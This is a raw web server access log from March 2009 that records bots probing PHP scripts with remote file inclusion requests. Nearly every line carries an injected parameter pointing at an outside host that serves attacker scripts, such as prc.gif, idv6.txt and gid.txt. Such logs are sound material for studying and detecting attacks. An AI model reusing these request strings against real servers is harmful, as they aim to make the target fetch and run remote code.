65.99.202.130 - - [11/Mar/2009:17:45:24 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.73.144.112 - - [11/Mar/2009:17:46:28 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
69.73.144.112 - - [11/Mar/2009:17:46:28 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
69.73.144.112 - - [11/Mar/2009:17:46:28 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
69.73.144.112 - - [11/Mar/2009:17:46:37 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
69.73.144.112 - - [11/Mar/2009:17:46:37 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
69.73.144.112 - - [11/Mar/2009:17:46:37 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
65.99.202.130 - - [11/Mar/2009:17:46:43 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.99.202.130 - - [11/Mar/2009:17:46:43 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.99.202.130 - - [11/Mar/2009:17:46:43 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.175.230.5 - - [11/Mar/2009:17:46:47 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
66.175.230.5 - - [11/Mar/2009:17:46:48 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
66.175.230.5 - - [11/Mar/2009:17:46:48 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
66.175.230.5 - - [11/Mar/2009:17:46:50 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
66.175.230.5 - - [11/Mar/2009:17:46:50 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
66.175.230.5 - - [11/Mar/2009:17:46:50 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
216.117.136.95 - - [11/Mar/2009:17:47:22 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.117.136.95 - - [11/Mar/2009:17:47:22 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.117.136.95 - - [11/Mar/2009:17:47:22 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.219.34.51 - - [11/Mar/2009:17:47:25 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.219.34.51 - - [11/Mar/2009:17:47:25 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.219.34.51 - - [11/Mar/2009:17:47:25 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.117.136.95 - - [11/Mar/2009:17:47:25 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.117.136.95 - - [11/Mar/2009:17:47:25 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.117.136.95 - - [11/Mar/2009:17:47:26 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
216.117.136.95 - - [11/Mar/2009:17:47:29 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.117.136.95 - - [11/Mar/2009:17:47:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.117.136.95 - - [11/Mar/2009:17:47:29 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.219.34.51 - - [11/Mar/2009:17:48:07 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.219.34.51 - - [11/Mar/2009:17:48:07 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.219.34.51 - - [11/Mar/2009:17:48:07 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.59.166.114 - - [11/Mar/2009:17:49:25 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
209.59.166.114 - - [11/Mar/2009:17:49:25 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.59.166.114 - - [11/Mar/2009:17:49:25 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.38.11.214 - - [11/Mar/2009:17:49:55 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:17:49:55 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:17:49:55 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:17:50:02 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:17:50:02 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:17:50:02 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
87.241.44.41 - - [11/Mar/2009:17:53:23 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.241.44.41 - - [11/Mar/2009:17:53:23 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.241.44.41 - - [11/Mar/2009:17:53:23 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.241.44.41 - - [11/Mar/2009:17:53:23 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.241.44.41 - - [11/Mar/2009:17:53:23 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.241.44.41 - - [11/Mar/2009:17:53:23 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
190.144.44.36 - - [11/Mar/2009:17:55:19 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
190.144.44.36 - - [11/Mar/2009:17:55:19 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.144.44.36 - - [11/Mar/2009:17:55:19 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
80.67.30.137 - - [11/Mar/2009:18:00:05 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
80.67.30.137 - - [11/Mar/2009:18:00:08 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
65.99.202.130 - - [11/Mar/2009:18:03:54 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
65.99.202.130 - - [11/Mar/2009:18:03:54 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.58.175.166 - - [11/Mar/2009:18:10:02 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
70.58.175.166 - - [11/Mar/2009:18:10:03 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
70.58.175.166 - - [11/Mar/2009:18:10:03 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
81.56.231.254 - - [11/Mar/2009:18:14:57 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.56.231.254 - - [11/Mar/2009:18:14:58 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.56.231.254 - - [11/Mar/2009:18:14:59 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://w0rmz.100webspace.net/prc.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.208.250.62 - - [11/Mar/2009:18:18:24 -0500] "GET /logs/zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:18:24 -0500] "GET /logs/access_log.1234224000/zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:18:24 -0500] "GET /zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:18:26 -0500] "GET /logs/zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:18:26 -0500] "GET /zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:18:26 -0500] "GET /logs/access_log.1234224000/zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:19:11 -0500] "GET /logs/access_log.1234137600/zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:19:14 -0500] "GET /logs/access_log.1234137600/zero_vote/index.php?db_config=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.15.94.23 - - [11/Mar/2009:18:27:32 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
67.15.94.23 - - [11/Mar/2009:18:27:32 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
65.55.208.131 - - [11/Mar/2009:18:36:40 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [11/Mar/2009:18:36:41 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.44.70.253 - - [11/Mar/2009:18:38:09 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.70.253 - - [11/Mar/2009:18:38:09 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.70.253 - - [11/Mar/2009:18:38:09 -0500] "GET /logs/access_log.1230163200/lostpasswd.php?env[include_prefix]=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.179.175.12 - - [11/Mar/2009:18:39:31 -0500] "GET /?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:18:39:31 -0500] "GET /logs/?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:18:39:37 -0500] "GET /?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:18:39:38 -0500] "GET /logs/?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.808"
88.208.250.62 - - [11/Mar/2009:18:39:53 -0500] "GET /?reflect_base=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:39:53 -0500] "GET /logs/access_log.1232064000/?reflect_base=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:39:54 -0500] "GET /logs/?reflect_base=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 200 181175 "-""Mozilla/5.0"
70.38.11.214 - - [11/Mar/2009:18:40:39 -0500] "GET /?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:18:40:40 -0500] "GET /logs/?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.814"
88.208.250.62 - - [11/Mar/2009:18:42:02 -0500] "GET /logs/access_log.1232064000/?reflect_base=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:42:02 -0500] "GET /?reflect_base=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
88.208.250.62 - - [11/Mar/2009:18:42:03 -0500] "GET /logs/?reflect_base=http://www.spiraldance.com.au//guestbook/id1.txt? HTTP/1.1" 200 181175 "-""Mozilla/5.0"
64.38.50.26 - - [11/Mar/2009:18:47:56 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
64.38.50.26 - - [11/Mar/2009:18:47:57 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
70.38.11.214 - - [11/Mar/2009:18:54:22 -0500] "GET /?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.814"
70.38.11.214 - - [11/Mar/2009:18:54:23 -0500] "GET /logs/?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.814"
66.179.175.12 - - [11/Mar/2009:18:57:57 -0500] "GET /?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:18:57:58 -0500] "GET /logs/?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:18:58:11 -0500] "GET /?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
66.179.175.12 - - [11/Mar/2009:18:58:12 -0500] "GET /logs/?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 181175 "-""libwww-perl/5.808"